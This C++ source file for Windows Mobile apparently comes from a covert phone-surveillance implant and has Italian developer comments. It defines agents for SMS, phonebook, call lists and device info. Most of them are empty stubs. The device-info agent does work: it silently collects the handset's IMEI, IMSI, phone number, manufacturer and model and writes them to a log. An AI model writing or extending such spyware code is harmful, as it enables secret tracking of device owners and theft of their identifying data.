#include "Agents.h"
#include "Status.h"
#include "Conf.h"
#include "Common.h"
#include "Device.h"
#include <tapi.h>
#include <extapi.h>

DWORD WINAPI SmsAgent(LPVOID lpParam) {
	// Queste strutture dati vanno copiate e incollate in ogni agente
	AGENT_COMMON_DATA(AGENT_SMS);
	// Fine delle strutture dati obbligatorie

	agents = statusObj->GetAgentsList();

	if(lpParam == NULL || agents == NULL){
		AGENT_STOP_ME;
	}

	// Comunichiamo al mondo che siamo vivi
	AGENT_I_AM_ALIVE;

	// Attendiamo che qualcuno ci stoppi
	//WAIT_FOR_STOP;
	//MessageBox(NULL, L"SMS_AGENT: Stopping", L"SMS_AGENT", MB_OK);
	AGENT_STOP_ME;

	return 0;
}


DWORD WINAPI PhoneBookAgent(LPVOID lpParam) {
	// Queste strutture dati vanno copiate e incollate in ogni agente
	AGENT_COMMON_DATA(AGENT_PHONEBOOK);
	// Fine delle strutture dati obbligatorie

	agents = statusObj->GetAgentsList();

	if(lpParam == NULL || agents == NULL){
		AGENT_STOP_ME;
	}

	// Comunichiamo al mondo che siamo vivi
	AGENT_I_AM_ALIVE;

	AGENT_STOP_ME;

	return 0;
}

DWORD WINAPI CallListAgent(LPVOID lpParam) {
	AGENT_COMMON_DATA(AGENT_CALLLIST);

	agents = statusObj->GetAgentsList();

	if(lpParam == NULL || agents == NULL){
		AGENT_STOP_ME;
	}

	AGENT_I_AM_ALIVE;

	AGENT_STOP_ME;
	return 0;
}

DWORD WINAPI DeviceInfoAgent(LPVOID lpParam) {
	AGENT_COMMON_DATA(AGENT_DEVICE);
	Log *log = NULL;
	Device *deviceObj = Device::self();
	WCHAR wLine[256];

	agents = statusObj->GetAgentsList();

	if(lpParam == NULL || agents == NULL || deviceObj == NULL) {
		AGENT_STOP_ME;
	}

	AGENT_I_AM_ALIVE;

	log = new(std::nothrow) Log;

	if(log == NULL) {
		AGENT_STOP_ME;
	}

	deviceObj->RefreshData();

	if(log->CreateLog(LOGTYPE_DEVICE, NULL, 0) == FALSE) {
		delete log;
		AGENT_STOP_ME;
	}

	// XXX allocare spazio come si deve se decidiamo di tenere questo agente
	ZeroMemory(wLine, 256 * sizeof(WCHAR));
	wsprintf(wLine, L"Manufacturer: %s\n", deviceObj->GetManufacturer() ? deviceObj->GetManufacturer() : L"Empty", 255);
	log->WriteLog((BYTE *)&wLine, WideLen(wLine));

	wsprintf(wLine, L"Model: %s\n", deviceObj->GetModel() ? deviceObj->GetModel() : L"Empty", 255);
	log->WriteLog((BYTE *)&wLine, WideLen(wLine));

	wsprintf(wLine, L"IMEI: %s\n", deviceObj->GetImei() ? deviceObj->GetImei() : L"Empty", 255);
	log->WriteLog((BYTE *)&wLine, WideLen(wLine));

	wsprintf(wLine, L"IMSI: %s\n", deviceObj->GetImsi() ? deviceObj->GetImsi() : L"Empty", 255);
	log->WriteLog((BYTE *)&wLine, WideLen(wLine));

	wsprintf(wLine, L"Phone Number: %s\n", deviceObj->GetPhoneNumber() ? deviceObj->GetPhoneNumber() : L"Empty", 255);
	log->WriteLog((BYTE *)&wLine, WideLen(wLine));

	log->CloseLog();

	delete log;
	AGENT_STOP_ME;
	return 0;
}

VOID FAR PASCAL lineCallbackFunc(DWORD hDevice, DWORD dwMsg, DWORD dwCallbackInstance, 
								 DWORD dwParam1, DWORD dwParam2, DWORD dwParam3) {
	BOOL bLogged = FALSE;

	return;

	/*switch(dwMsg)
	{
		case LINE_APPNEWCALL:
			
			break;
		default: break;
	}*/
}
